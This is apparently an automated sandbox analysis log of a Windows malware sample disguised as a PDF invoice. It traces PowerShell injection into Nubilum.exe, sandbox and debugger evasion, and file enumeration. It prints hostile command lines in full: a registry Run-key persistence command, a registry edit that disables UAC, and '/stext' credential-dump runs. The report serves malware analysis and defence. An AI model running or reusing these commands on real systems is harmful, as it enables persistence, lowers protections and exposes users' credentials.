Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe API/Special instruction interceptor: Address: 2235C58
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 28_2_0040DD85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6261 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3550 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Window / User API: threadDelayed 3425 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Window / User API: threadDelayed 5535 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Window / User API: foregroundWindowGot 1760 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe API coverage: 8.4 %
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe API coverage: 9.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1416 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7896 Thread sleep count: 3425 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7916 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7920 Thread sleep count: 5535 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7920 Thread sleep time: -16605000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8164 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5296 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Thread sleep count: Count: 3425 delay: -5 Jump to behavior
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_00406404 FindFirstFileW,FindClose, 0_2_00406404
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_004058B2 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004058B2
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 16_2_1FAB10F1
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB6580 FindFirstFileExA, 16_2_1FAB6580
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040AE51 FindFirstFileW,FindNextFileW, 28_2_0040AE51
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 29_2_00407EF8
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 30_2_00407898
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00418981 memset,GetSystemInfo, 28_2_00418981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\AppData\ Jump to behavior
Source: Nubilum.exe, 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZ
Source: Nubilum.exe, 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3273929977.000002CE9202B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3274897690.000002CE97654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3273898408.000002CE92013000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW p
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044ED6E0 LdrInitializeThunk, 2_2_044ED6E0
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_1FAB2639
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 28_2_0040DD85
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 28_2_004044A4
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB4AB4 mov eax, dword ptr fs:[00000030h] 16_2_1FAB4AB4
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB724E GetProcessHeap, 16_2_1FAB724E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_1FAB2B1C
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_1FAB2639
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_1FAB60E2

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Nubilum.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Nubilum.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Nubilum.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Nubilum.exe base: 1AA0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Nubilum.exe base: 19FFF4 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "husmndenes" /t reg_expand_sz /d "%tomboyism% -windowstyle minimized $eftertaklede=(get-itemproperty -path 'hkcu:\bukkespringenes\').hovedstads;%tomboyism% ($eftertaklede)"
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "husmndenes" /t reg_expand_sz /d "%tomboyism% -windowstyle minimized $eftertaklede=(get-itemproperty -path 'hkcu:\bukkespringenes\').hovedstads;%tomboyism% ($eftertaklede)" Jump to behavior
Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager'
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managervider
Source: Nubilum.exe, 00000010.00000003.1685702542.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1684092938.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerV\
Source: Nubilum.exe, 00000010.00000003.1685702542.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715637913.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1684092938.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\R|FK
Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\2
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager2\
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\-\
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\(a~
Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageru
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager\
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\*
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4D\.|jK
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: Nubilum.exe, 00000010.00000002.3696165751.000000001F588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager>
Source: Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerTD~1
Source: Nubilum.exe, 00000010.00000003.1715637913.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002874000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB2933 cpuid 16_2_1FAB2933
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 16_2_1FAB2264
